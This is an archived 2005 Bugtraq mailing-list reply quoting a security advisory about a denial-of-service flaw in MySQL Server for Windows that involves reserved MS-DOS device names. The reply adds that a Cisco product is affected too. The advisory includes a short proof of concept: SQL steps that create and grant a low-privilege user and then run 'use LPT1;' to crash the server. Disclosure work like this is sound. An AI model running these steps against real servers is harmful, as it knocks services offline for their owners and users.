[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3BEC0FC090F538409A0736B2D37DA0ED013D3547@icptex02.corp.icpt.net>
Date: Wed, 16 Mar 2005 11:49:37 -0500
From: "BugTrap" <bugtrap@...erCept.Net>
To: <bugtraq@...urityfocus.com>
Subject: RE: Denial of Service Vulnerability in MySQL Server for Windows
Cisco threat response 2.0.5.138 for Cisco's IDS Appliances is vulnerable
to this.
Thanks,
Michael Brown
-----Original Message-----
From: Luca Ercoli [mailto:io@...aercoli.it]
Posted At: Tuesday, March 15, 2005 1:47 PM
Posted To: BugTrap
Conversation: Denial of Service Vulnerability in MySQL Server for
Windows
Subject: Denial of Service Vulnerability in MySQL Server for Windows
Package: MySQL Database Server for Windows
Auth: http://www.mysql.com/
Version(s): 4.1.XX/4.0.XX/5.0.XX
Vulnerability Type: Denial of Service
Disclaimer:
==========
The information is provided "as is" without warranty of any kind.
The author of this issue shall not be held liable for any
downtime, lost profits, or damages due to the informations
contained in this advisory.
What's MySQL:
============
MySQL is a multi-user, multi-threaded relational database management
system.
The MySQL database server is the world's most popular open source
database.
Vulnerability Description:
=========================
A vulnerability exist in the way application handle requests
containing reserved MS-DOS devices name (AUX,CON,COM1,LPT1 and PRN).
This flaw allows an authenticaded user with at least one of those
privileges globally (on *.*):
- REFERENCES
- CREATE TEMPORARY TABLES
- GRANT OPTION
- CREATE
- SELECT
to cause the service to fail.
Proof of Concept:
================
1- Create an user account:
(connected as 'root')
use mysql;
INSERT INTO user (Host,User,Password)
VALUES('%','customer',PASSWORD('customer'));
2- Grant to him one or more privileges reported above:
(connected as 'root')
GRANT CREATE TEMPORARY TABLES ON *.* TO 'customer'@'%';
flush privileges;
3- Connect to server using new account and 'use' the database 'LPT1':
(connected as 'customer')
use LPT1;
Vendor Status:
=============
http://bugs.mysql.com/
ID: 9148
Updated by: Miguel Solorzano
Reported by: Luca Ercoli
User Type: User
Status: Verified
Severity: S2 (Serious)
Category: Server
Operating System: Windows
-Version: 4.1.9
+Version: 4.1.XX/4.0.XX/5.0.XX
Credits:
---
Luca Ercoli
io [at] lucaercoli.it
www.lucaercoli.it
Powered by blists - more mailing lists